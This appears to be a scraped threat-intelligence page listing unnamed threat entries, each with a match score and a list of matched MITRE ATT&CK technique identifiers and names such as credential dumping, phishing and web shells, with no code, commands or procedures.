- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1071.003 - Mail Protocols
- T1112 - Modify Registry
- T1134.002 - Create Process with Token
- T1547.004 - Winlogon Helper DLL
- T1090 - Proxy
- T1588.001 - Malware
- T1102 - Web Service
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1584.006 - Web Services
- T1102.002 - Bidirectional Communication
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1518.001 - Security Software Discovery
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1555.004 - Windows Credential Manager
- T1027.010 - Command Obfuscation
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1090.001 - Internal Proxy
Link to MITRE →
Score: 10.11
Matched TTPs:
- T1560.001 - Archive via Utility
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1039 - Data from Network Shared Drive
- T1059.003 - Windows Command Shell
Link to MITRE →
Score: 60.20
Matched TTPs:
- T1560.001 - Archive via Utility
- T1218.011 - Rundll32
- T1587.001 - Malware
- T1040 - Network Sniffing
- T1190 - Exploit Public-Facing Application
- T1564.011 - Ignore Process Interrupts
- T1562.004 - Disable or Modify System Firewall
- T1681 - Search Threat Vendor Data
- T1003.001 - LSASS Memory
- T1548 - Abuse Elevation Control Mechanism
- T1588.001 - Malware
- T1057 - Process Discovery
- T1554 - Compromise Host Software Binary
- T1059.001 - PowerShell
- T1212 - Exploitation for Credential Access
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1587.004 - Exploits
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1059.012 - Hypervisor CLI
- T1070.004 - File Deletion
Link to MITRE →
Score: 47.90
Matched TTPs:
- T1560.001 - Archive via Utility
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1587.001 - Malware
- T1543.003 - Windows Service
- T1583.005 - Botnet
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1003.001 - LSASS Memory
- T1059 - Command and Scripting Interpreter
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1027 - Obfuscated Files or Information
- T1614.001 - System Language Discovery
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1569.002 - Service Execution
Link to MITRE →
Score: 19.79
Matched TTPs:
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1539 - Steal Web Session Cookie
- T1543.003 - Windows Service
- T1112 - Modify Registry
- T1588.002 - Tool
- T1012 - Query Registry
- T1134 - Access Token Manipulation
- T1090.001 - Internal Proxy
Link to MITRE →
Score: 42.47
Matched TTPs:
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1543.003 - Windows Service
- T1574.001 - DLL
- T1007 - System Service Discovery
- T1021.002 - SMB/Windows Admin Shares
- T1021 - Remote Services
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1087 - Account Discovery
- T1588.001 - Malware
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 28.81
Matched TTPs:
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1657 - Financial Theft
- T1588.002 - Tool
- T1566 - Phishing
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1570 - Lateral Tool Transfer
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
Link to MITRE →
Score: 23.39
Matched TTPs:
- T1560.001 - Archive via Utility
- T1558 - Steal or Forge Kerberos Tickets
- T1219 - Remote Access Tools
- T1657 - Financial Theft
- T1059.001 - PowerShell
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1531 - Account Access Removal
- T1486 - Data Encrypted for Impact
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 27.92
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1080 - Taint Shared Content
- T1543.003 - Windows Service
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1090 - Proxy
- T1657 - Financial Theft
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1078.002 - Domain Accounts
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 69.83
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1548.002 - Bypass User Account Control
- T1543.003 - Windows Service
- T1559.001 - Component Object Model
- T1106 - Native API
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1608.002 - Upload Tool
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1657 - Financial Theft
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1570 - Lateral Tool Transfer
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1650 - Acquire Access
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1529 - System Shutdown/Reboot
- T1218.014 - MMC
Link to MITRE →
Score: 60.25
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1003 - OS Credential Dumping
- T1584.008 - Network Devices
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1547.009 - Shortcut Modification
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1102.003 - One-Way Communication
- T1534 - Internal Spearphishing
- T1547.001 - Registry Run Keys / Startup Folder
- T1078 - Valid Accounts
- T1218.010 - Regsvr32
- T1587.004 - Exploits
- T1589.001 - Credentials
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1197 - BITS Jobs
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 26.54
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1574.001 - DLL
- T1040 - Network Sniffing
- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1562.001 - Disable or Modify Tools
- T1570 - Lateral Tool Transfer
- T1569.002 - Service Execution
- T1090.001 - Internal Proxy
- T1211 - Exploitation for Defense Evasion
Link to MITRE →
Score: 30.88
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1007 - System Service Discovery
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1136 - Create Account
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 25.72
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1036 - Masquerading
- T1057 - Process Discovery
- T1547.001 - Registry Run Keys / Startup Folder
- T1027 - Obfuscated Files or Information
- T1518.001 - Security Software Discovery
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1566.003 - Spearphishing via Service
Score: 13.59
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1021.002 - SMB/Windows Admin Shares
- T1505.003 - Web Shell
- T1546.008 - Accessibility Features
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1218.010 - Regsvr32
Score: 58.98
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1548.002 - Bypass User Account Control
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1608.004 - Drive-by Target
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1608.002 - Upload Tool
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1021.006 - Windows Remote Management
- T1003.001 - LSASS Memory
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1195.002 - Compromise Software Supply Chain
- T1203 - Exploitation for Client Execution
- T1012 - Query Registry
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Score: 9.97
Matched TTPs:
- T1113 - Screen Capture
- T1659 - Content Injection
- T1090 - Proxy
- T1059.001 - PowerShell
Score: 15.23
Matched TTPs:
- T1113 - Screen Capture
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1059.001 - PowerShell
- T1566 - Phishing
- T1195.002 - Compromise Software Supply Chain
- T1027.010 - Command Obfuscation
Score: 5.60
Matched TTPs:
- T1113 - Screen Capture
- T1056.001 - Keylogging
- T1070.004 - File Deletion
Score: 14.15
Matched TTPs:
- T1113 - Screen Capture
- T1204.002 - Malicious File
- T1547.001 - Registry Run Keys / Startup Folder
- T1218.001 - Compiled HTML File
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1566.003 - Spearphishing via Service
Score: 24.99
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1112 - Modify Registry
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1027.010 - Command Obfuscation
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
Score: 39.22
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1505.003 - Web Shell
- T1547.004 - Winlogon Helper DLL
- T1057 - Process Discovery
- T1547.001 - Registry Run Keys / Startup Folder
- T1573 - Encrypted Channel
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
Score: 39.66
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1584.008 - Network Devices
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1218.007 - Msiexec
- T1140 - Deobfuscate/Decode Files or Information
- T1036 - Masquerading
- T1555.003 - Credentials from Web Browsers
- T1583.006 - Web Services
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1102.002 - Bidirectional Communication
- T1012 - Query Registry
- T1059.006 - Python
- T1598 - Phishing for Information
- T1059.003 - Windows Command Shell
- T1105 - Ingress Tool Transfer
- T1665 - Hide Infrastructure
Score: 37.26
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1036 - Masquerading
- T1021.002 - SMB/Windows Admin Shares
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1486 - Data Encrypted for Impact
- T1056 - Input Capture
- T1566.004 - Spearphishing Voice
- T1570 - Lateral Tool Transfer
- T1656 - Impersonation
- T1059.003 - Windows Command Shell
- T1219.002 - Remote Desktop Software
- T1105 - Ingress Tool Transfer
- T1566.003 - Spearphishing via Service
Score: 32.47
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1218.005 - Mshta
- T1598.002 - Spearphishing Attachment
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1203 - Exploitation for Client Execution
- T1518.001 - Security Software Discovery
- T1027.010 - Command Obfuscation
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
Score: 13.47
Matched TTPs:
- T1218.011 - Rundll32
- T1543.003 - Windows Service
- T1219 - Remote Access Tools
- T1562.004 - Disable or Modify System Firewall
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1102.002 - Bidirectional Communication
Score: 21.21
Matched TTPs:
- T1218.011 - Rundll32
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1036 - Masquerading
- T1589.002 - Email Addresses
- T1218.005 - Mshta
- T1218.010 - Regsvr32
- T1027.003 - Steganography
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Score: 43.87
Matched TTPs:
- T1218.011 - Rundll32
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1588.001 - Malware
- T1553.005 - Mark-of-the-Web Bypass
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1486 - Data Encrypted for Impact
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Score: 25.54
Matched TTPs:
- T1218.011 - Rundll32
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1036 - Masquerading
- T1588.001 - Malware
- T1102 - Web Service
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Score: 6.25
Matched TTPs:
- T1027.009 - Embedded Payloads
- T1566.002 - Spearphishing Link
- T1059.003 - Windows Command Shell
Score: 8.95
Matched TTPs:
- T1056.001 - Keylogging
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1555.003 - Credentials from Web Browsers
- T1105 - Ingress Tool Transfer
- T1566.003 - Spearphishing via Service
Score: 32.67
Matched TTPs:
- T1056.001 - Keylogging
- T1204.002 - Malicious File
- T1080 - Taint Shared Content
- T1497.001 - System Checks
- T1566.001 - Spearphishing Attachment
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1497 - Virtualization/Sandbox Evasion
- T1057 - Process Discovery
- T1497.002 - User Activity Based Checks
- T1547.001 - Registry Run Keys / Startup Folder
- T1203 - Exploitation for Client Execution
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
Score: 20.59
Matched TTPs:
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1505.003 - Web Shell
- T1090.002 - External Proxy
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1203 - Exploitation for Client Execution
- T1059.006 - Python
- T1105 - Ingress Tool Transfer
Score: 16.79
Matched TTPs:
- T1056.001 - Keylogging
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1036 - Masquerading
- T1055 - Process Injection
- T1003.001 - LSASS Memory
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
- T1056.004 - Credential API Hooking
Score: 13.19
Matched TTPs:
- T1056.001 - Keylogging
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1056.002 - GUI Input Capture
- T1078 - Valid Accounts
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
Score: 7.43
Matched TTPs:
- T1003 - OS Credential Dumping
- T1007 - System Service Discovery
- T1057 - Process Discovery
- T1059.001 - PowerShell
Score: 4.97
Matched TTPs:
- T1003 - OS Credential Dumping
- T1078 - Valid Accounts
- T1059.003 - Windows Command Shell
Score: 40.57
Matched TTPs:
- T1003 - OS Credential Dumping
- T1583.002 - DNS Server
- T1190 - Exploit Public-Facing Application
- T1546.008 - Accessibility Features
- T1583.003 - Virtual Private Server
- T1584.005 - Botnet
- T1566 - Phishing
- T1078 - Valid Accounts
- T1553 - Subvert Trust Controls
- T1203 - Exploitation for Client Execution
- T1189 - Drive-by Compromise
- T1563.002 - RDP Hijacking
- T1021.001 - Remote Desktop Protocol
- T1001.002 - Steganography
Score: 80.37
Matched TTPs:
- T1006 - Direct Volume Access
- T1539 - Steal Web Session Cookie
- T1484.002 - Trust Modification
- T1598.003 - Spearphishing Link
- T1070.008 - Clear Mailbox Data
- T1552.004 - Private Keys
- T1598.004 - Spearphishing Voice
- T1087 - Account Discovery
- T1090 - Proxy
- T1588.001 - Malware
- T1552.001 - Credentials In Files
- T1657 - Financial Theft
- T1204 - User Execution
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1656 - Impersonation
- T1598 - Phishing for Information
- T1213.003 - Code Repositories
- T1219.002 - Remote Desktop Software
- T1136 - Create Account
- T1538 - Cloud Service Dashboard
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1213.005 - Messaging Applications
Score: 66.32
Matched TTPs:
- T1588.007 - Artificial Intelligence
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1608.001 - Upload Malware
- T1036 - Masquerading
- T1071.003 - Mail Protocols
- T1681 - Search Threat Vendor Data
- T1090 - Proxy
- T1583.003 - Virtual Private Server
- T1497 - Virtualization/Sandbox Evasion
- T1657 - Financial Theft
- T1583.006 - Web Services
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1656 - Impersonation
- T1059.006 - Python
- T1543.001 - Launch Agent
- T1059.003 - Windows Command Shell
- T1219.002 - Remote Desktop Software
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1059.005 - Visual Basic
- T1204.004 - Malicious Copy and Paste
- T1566.003 - Spearphishing via Service
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Score: 20.15
Matched TTPs:
- T1539 - Steal Web Session Cookie
- T1548.002 - Bypass User Account Control
- T1497.001 - System Checks
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1555 - Credentials from Password Stores
- T1219.002 - Remote Desktop Software
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
Score: 19.56
Matched TTPs:
- T1539 - Steal Web Session Cookie
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1598.002 - Spearphishing Attachment
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1550.004 - Web Session Cookie
Score: 16.82
Matched TTPs:
- T1583.008 - Malvertising
- T1566.002 - Spearphishing Link
- T1608.004 - Drive-by Target
- T1608.001 - Upload Malware
- T1583.004 - Server
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
Score: 20.56
Matched TTPs:
- T1003.004 - LSA Secrets
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1055.013 - Process Doppelgänging
- T1552.001 - Credentials In Files
- T1588.002 - Tool
- T1027.010 - Command Obfuscation
- T1189 - Drive-by Compromise
Score: 20.92
Matched TTPs:
- T1587.001 - Malware
- T1040 - Network Sniffing
- T1190 - Exploit Public-Facing Application
- T1602.002 - Network Device Configuration Dump
- T1562.004 - Disable or Modify System Firewall
- T1588.002 - Tool
- T1136 - Create Account
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Score: 12.68
Matched TTPs:
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1091 - Replication Through Removable Media
- T1036 - Masquerading
- T1588.002 - Tool
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
Score: 4.41
Matched TTPs:
- T1587.001 - Malware
- T1003.001 - LSASS Memory
- T1588.002 - Tool
Score: 11.23
Matched TTPs:
- T1587.001 - Malware
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1505.003 - Web Shell
- T1588.002 - Tool
- T1105 - Ingress Tool Transfer
Score: 53.87
Matched TTPs:
- T1587.001 - Malware
- T1543.003 - Windows Service
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1219 - Remote Access Tools
- T1036 - Masquerading
- T1562.004 - Disable or Modify System Firewall
- T1059.009 - Cloud API
- T1610 - Deploy Container
- T1552.004 - Private Keys
- T1102 - Web Service
- T1552.001 - Credentials In Files
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1048 - Exfiltration Over Alternative Protocol
- T1562.001 - Disable or Modify Tools
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1595.001 - Scanning IP Blocks
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Score: 17.40
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1657 - Financial Theft
- T1614.001 - System Language Discovery
- T1518.001 - Security Software Discovery
- T1059.005 - Visual Basic
Score: 5.55
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
Score: 7.15
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1203 - Exploitation for Client Execution
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
Score: 10.80
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.004 - Drive-by Target
- T1203 - Exploitation for Client Execution
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
Score: 10.99
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Score: 12.58
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1547.001 - Registry Run Keys / Startup Folder
- T1219.002 - Remote Desktop Software
- T1189 - Drive-by Compromise
- T1102.001 - Dead Drop Resolver
Score: 25.41
Matched TTPs:
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.004 - Drive-by Target
- T1505.003 - Web Shell
- T1583.004 - Server
- T1583.003 - Virtual Private Server
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1584.006 - Web Services
- T1189 - Drive-by Compromise
- T1566.003 - Spearphishing via Service
Score: 3.31
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1059.001 - PowerShell
- T1588.002 - Tool
Score: 5.69
Matched TTPs:
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1547.001 - Registry Run Keys / Startup Folder
- T1189 - Drive-by Compromise
Score: 22.53
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1555.003 - Credentials from Web Browsers
- T1102 - Web Service
- T1218.005 - Mshta
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1203 - Exploitation for Client Execution
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
Score: 14.15
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1589.002 - Email Addresses
- T1102 - Web Service
- T1203 - Exploitation for Client Execution
- T1566.003 - Spearphishing via Service
Score: 24.27
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1112 - Modify Registry
- T1589.002 - Email Addresses
- T1059 - Command and Scripting Interpreter
- T1497 - Virtualization/Sandbox Evasion
- T1583.006 - Web Services
- T1059.001 - PowerShell
- T1562.001 - Disable or Modify Tools
- T1203 - Exploitation for Client Execution
- T1656 - Impersonation
- T1059.003 - Windows Command Shell
Score: 7.96
Matched TTPs:
- T1204.002 - Malicious File
- T1574.001 - DLL
- T1003.001 - LSASS Memory
- T1059 - Command and Scripting Interpreter
- T1588.002 - Tool
- T1105 - Ingress Tool Transfer
Score: 5.36
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1059.001 - PowerShell
- T1203 - Exploitation for Client Execution
- T1059.005 - Visual Basic
Score: 6.38
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1036 - Masquerading
- T1059.001 - PowerShell
- T1059.003 - Windows Command Shell
- T1105 - Ingress Tool Transfer
Score: 22.89
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1547.009 - Shortcut Modification
- T1112 - Modify Registry
- T1055.002 - Portable Executable Injection
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1059.003 - Windows Command Shell
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Score: 20.44
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1608.001 - Upload Malware
- T1218.005 - Mshta
- T1598.002 - Spearphishing Attachment
- T1518.001 - Security Software Discovery
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
Score: 3.11
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
Score: 16.55
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1588.001 - Malware
- T1057 - Process Discovery
- T1592.002 - Software
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
Score: 6.63
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1007 - System Service Discovery
- T1203 - Exploitation for Client Execution
- T1059.003 - Windows Command Shell
Score: 6.44
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1203 - Exploitation for Client Execution
- T1518.001 - Security Software Discovery
- T1070.004 - File Deletion
Score: 5.30
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1583.006 - Web Services
- T1588.002 - Tool
- T1105 - Ingress Tool Transfer
Score: 10.94
